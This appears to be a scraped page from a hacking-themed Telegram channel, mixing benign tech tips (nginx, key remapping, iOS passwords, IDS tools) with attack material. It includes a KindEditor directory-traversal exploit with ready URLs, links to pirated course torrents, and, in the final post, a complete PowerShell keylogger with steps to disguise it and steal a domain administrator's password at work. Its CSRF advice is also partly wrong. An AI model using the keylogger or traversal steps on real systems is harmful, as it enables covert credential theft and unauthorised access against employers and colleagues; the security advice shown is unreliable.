UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Kindeditor traverse directory 0DAY problem:

KindEditor is a set of open source HTML visual editor, mainly used to allow users to obtain WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. KindEditor is very suitable for use on CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.

πŸ¦‘Use method:

1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php


2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Detect and remove malicious code from your phone or PC:

Malware is a catch-all term for any and every destructive / parasitic software specifically designed to harm your server, computer, network, or your phone. It is called by different names, but they all have the same intention.

There is Ransomware, which is literally software designed to steal your information and demand a ransom.

GonnaCry - Linux ransomware that encrypts all user files
With threats to reveal some data and secrets, the victim has no
choice but to pay a ransom.

In addition, there is Spyware, which is similar to Agent 007, which is malicious software designed to collect and steal information from its victims.

πŸ¦‘There are other variations:


1) Logic bomb

2) Computer worms

3) Trojan horse

4) Rootkit

5) Virus

πŸ¦‘But we are not discussing these terms and examples in today's.

It is important to know that your computer or phone can be infected with malware in various ways.

While most malware has the same symptoms and signs, some are more dangerous than others.

In fact, they all have the same result and backfire.

πŸ¦‘Malware on your phone

Most people doubt that mobile devices can get infected with malware.

Β» It's true?

πŸ¦‘This is 101% possible, well, maybe not in the standard traditional method, for iPhone and Apple devices.

But, technically, the same process applies.

Let's look at the problem more specifically.

Once the malware connects to your phone, it performs several
operations.

Competing with your phone's resources and destroying many programs.

The classic signs of malware on your phone are:

Apps take longer to load

Your battery is draining faster than usual

Apps you haven't downloaded appear as available

πŸ¦‘How do I know if my phone is infected with a virus?

1) There are two ways to detect and remove malware from your phone.

2) Manual way

3) Automatic way

A) Step one: turn off your phone
The moment you spot the classic signs of malware infiltration, the first thing you do if you can't pinpoint where you entered is to turn off your phone.

B) Turning off your phone will stop further damage and the spread of malicious software to other programs.

C) This is the safest first option.

Step two: activate safe mode
Activating Safe Mode on your Android device is as easy as

Hold the power button for a few seconds.

Then, while your phone is on, hold the power off button.

Click on the reboot option; Most Android phones have this option.

πŸ¦‘Then click "Restart in Safe Mode".

For devices that do not have this option, turn off the phone by long pressing the power button.

Then press and hold the volume down button, wait until the device turns on.

The Safe Mode option will appear in the lower left corner of your phone.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to change WINDOWS, the assignment of keys on the keyboard :

1) Changing Key Functions with SharpKeys

If you want to change how one key works, you can use the simple open source SharpKeys program. It makes changes to the Windows registry. For example, you can make the Alt button work like Ctrl and the Caps Lock button like Windows.

2) Since SharpKeys writes information directly to the registry, this is a great option for those looking to change the purpose of individual keys. No middleware needed and there will be fewer compatibility issues as Windows itself will interpret keystrokes.

3) Download the program. The portable zip version is recommended and does not require installation. To reassign a key, click the Add button and select a key from the two columns. The left column indicates the key you are pressing. The right column indicates the new action of this key. You can press the Type Key button and the keyboard button if you cannot find the option you want in the list.

4) When you're done, click OK. Repeat this process for any other keys you want to remap. Then click on the button "Write to the registry". Close the program, restart your computer and the buttons should start working in a new way. You can uninstall SharpKeys.

https://sharpkeys.en.softonic.com/

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST 2020 HACKING COURSES TORRENTS:

ETHICAL HACKING WITH PYTHON 12 GB
> https://thepiratebay.org/description.php?id=31103760

py bootcam 4gb
> https://thepiratebay.org/description.php?id=30536442

Hacking 101 – Creating a Hacking Lab (CISA, CEH, CISSP)
>https://1337x.to/torrent/3028688/Udemy-Hacking-101-Creating-a-Hacking-Lab-CISA-CEH-CISSP/

https://1337x.to/torrent/3847061/Udemy-SEO-Tricks-and-Hacks-Making-Search-Engines-Work-for-You/

https://1337x.to/torrent/3199051/Udemy-The-Complete-Ethical-Hacking-Masterclass-Beginner-To-Expert/

https://1337x.to/torrent/4042894/Udemy-Computer-and-Network-Hacking-Mastery-Practical-Techniques/

THE TORRENT LINK IS LONG SO THIS ID easier for you :)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Cross-Site Request Forgery (CSRF)

1) CSRF gives hackers full control over applications to perform any unwanted actions.

2) With full control, hackers can perform malicious operations, passing infected code to your website, leading to data theft, functional changes, and more.

3) The attack forces users to change normal requests for modified destructive ones, such as transferring funds out of ignorance, deleting the entire database without any notifications, etc.

4) A CSRF attack can only be initiated after you click on a hidden malicious link sent by a hacker.

5) This means that if you are smart enough to identify infected hidden scripts, you can easily rule out any potential CSRF attack.

6) In the meantime, you can also use two safeguards to harden the security of your application, that is, by using GET requests in your URL and ensuring that non-GET requests are generated only from your client code.


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘LEARN MORE :

A) Prelude IDS

From the perspective of design, it is positioned to meet the needs of large-scale networks, and realizes network detectors, log analyzers, and alarm information centralized viewing and analysis tools. The network detector part is basically a copy of Snort's functions and is fully compatible with Snort's rule set. ( http://www.prelude-ids.org/ )

B) Firestorm

It is a very high-performance network intrusion detection system (NIDS). Currently it only implements the detector part and is fully compatible with Snort's rule set, but plans include real support for analysis, reporting, remote console and real-time sensor configuration. It is fully pluggable, so it is very flexible. It can record alarm information to the Prelude IDS manager. It claims to be much better than Snort in performance. http://www.scaramanga.co.uk/firestorm/

C) NetSTAT

Based on the research results of STAT (State Transition Analysis Technique) describing the attack, using the unique STATL language to describe the attack, the attack description text is converted into C++ code by the STATL interpretation tool and compiled into the detection engine to realize the detection function. It has been released. STATL language interpretation conversion tool and a basic example network detector part (a few examples of detection functions). To be proficient in using this IDS tool requires relatively strong programming skills, but with this IDS, very complex detection functions can be achieved.

http://www.cs.ucsb.edu/~rsg/STAT/

Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Database Injection: all you need to know :)


1) In case of sending untrusted pieces of data to the interpreter as a part of command through any area that takes user input i.e form input or any other data submission area, injection flaws occur.

2) The attacker’s malicious queries can trick the interpreter into executing commands that can show up confidential data that the user has no authorization to have a look at. For example in an SQL injection attack, when the form input is not properly sanitized, the attacker can enter the SQL database and access its contents without authorization,, just by entering malicious SQL database code in a form that is expecting a plaintext. Any type of field that takes the user’s input is injectable i.e parameters, environment variables, all web services, etc.

3) The application is vulnerable to the injection attack when user-supplied data is not sanitized and validated, by the use of dynamic queries without context-aware escaping and the use of hostile data directly. Injection flaws can easily be discovered through the examination of code and by the use of automated tools like scanners and fuzzers. To prevent injection attacks, there is some measure that can be taken like separating the data from commands and queries, use of a safe API that provides a parameterized interface, use of β€œwhite-list” server-side input validation through tools like Snort, escaping of special characters using specific escape syntax, etc.

Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘πŸ›  How to fix the [warn] could not build optimal proxy_headers_hash error ?

1) How to solve the problem: β€œnginx: [warn] could not build optimal proxy_headers_hash, you should increase either p roxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size error β€œ.

2) If you have an Nginx proxy that proxies multiple sites, you may encounter the error shown above in one way or another.

3) To fix the error, you will need to edit the files that serve the proxy sites.

were located in the /etc/nginx/sites.d/ directory.


πŸ¦‘location ~ /.git {
deny all;
}
proxy_redirect off; proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
###### Set as shown below. You can use other values for the numbers as you wish
proxy_headers_hash_max_size 512;
proxy_headers_hash_bucket_size 128;

proxy_redirect off;
proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}


4) After you've finished editing this small part, check your Nginx configuration by running the nginx -t command.

sudo nginx -t

5) You should get the following output:

nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How Password Tracking to Protect Against Hacks Works in iOS 14 ?

A) Monitoring passwords in Safari

1) If iCloud Keychain is configured to automatically enter passwords in mobile apps and web apps, Safari will alert you of cracked passwords when you visit the site.

2) If you use iCloud Keychain to automatically enter logins and passwords on sites in this browser, after logging in, the browser will warn you about the need to change the password on the site:

β€œThis password appeared in a data breach, which increases the risk of this account being compromised. You must change your password immediately. "

β€œThe iPhone can create a complex password for you. Do you want to change the password for [site name] "?


3) If you click on the "Change password on the site" button, a window will open in the "Passwords" menu in the system settings. Here you can enter and change the password on the site or use the "Forgot your password?" Command, depending on the options available on the site. iCloud Keychain helps you choose a strong password.

If the site has an option to sign in with an Apple account, it is suggested to do just that instead of having iCloud Keychain automatically generate a password. You will use your Apple ID to sign in to your account. This will limit the amount of information the site collects about you.

B) Monitoring passwords in settings

1) If you do not want to wait for the warning about vulnerable passwords from Safari, for which you need to sign in to your account on the site, you can open system preferences and see the security recommendations. This way you can take action before it's too late. This is also useful if you store passwords in the iCloud Keychain, but don't use it for automatic data entry, so you won't get alerts in Safari.

2) Open the "Passwords" section in the system settings. Or you can tell Siri to "Open Passwords." Use Face ID, Touch ID, or PIN to sign in.

3) After logging into your account, you will see an option to auto-complete passwords. Here you can choose iCloud Keychain or another password manager like LastPass to automatically enter your username and password. Below this option and before the list of accounts, you will see security recommendations. Open them up.

4 ) you will find high priority password changing guidelines that may be weak or used on more than one site. Other suggestions are given below. You will also see high priority password change recommendations that have emerged in data breaches.

You can click "Change password on the site" and this site will open. Or you can click on an account for more information. You will see your username and password, as well as risks associated with your account, such as weak and repeatedly used passwords. There is also a link "Change password on the site".

5) If you choose this link, iCloud Keychain can help you guess a new password, just like you do in Safari. You can sign in with your Apple account if the site supports it.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘βš™οΈHow to get an admin password on a work PC in an Active Directory domain?

A) we
will tell you about the method by which we can get the admin password in the Active Directory domain of your organization. It can be used to install, uninstall software, disable antivirus, access many corporate domain resources, access documents of other users on their PCs, and much more delicious. Well, first things first.

!) First, we find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example a folder icon or an icon of software allowed in the organization in * .ico format, for example 1C. I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.

πŸ¦‘Then open Windows PowerShell ISE and copy the keylogger script code:

#requires -Version 2

function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")

{

# Signatures for API Calls

$ signatures = @ '

[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]

public static extern short GetAsyncKeyState (int virtualKeyCode);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int GetKeyboardState (byte [] keystate);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int MapVirtualKey (uint uCode, int uMapType);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@

# load signatures and make members available

$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru


# create output file

$ null = New-Item -Path $ Path -ItemType File -Force

try

{

Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red




# create endless loop. When user presses CTRL + C, finally-block

# executes and shows the collected key presses

while ($ true) {

Start-Sleep -Milliseconds 40



# scan all ASCII codes above 8

for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {

# get current key state

$ state = $ API :: GetAsyncKeyState ($ ascii)




# is key pressed?

if ($ state -eq -32767) {

$ null = [console] :: CapsLock




# translate scan code to real code

$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)




# get keyboard state for virtual keys

$ kbstate = New-Object Byte [] 256

$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)




# prepare a StringBuilder to receive input key

$ mychar = New-Object -TypeName System.Text.StringBuilder




# translate virtual key

$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)




if ($ success)

{

# add key to logger file

[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)

}

}

}

}

}

finally

{

# open logger file in Notepad

notepad $ Path

}

}




# records all key presses until script is aborted by pressing CTRL + C

# will then open the file with collected key codes

Start-KeyLogger
Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, run our script with the Run script command or with the F5 button and minimize the window


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
get an admin password on a work PC in an Active Directory domain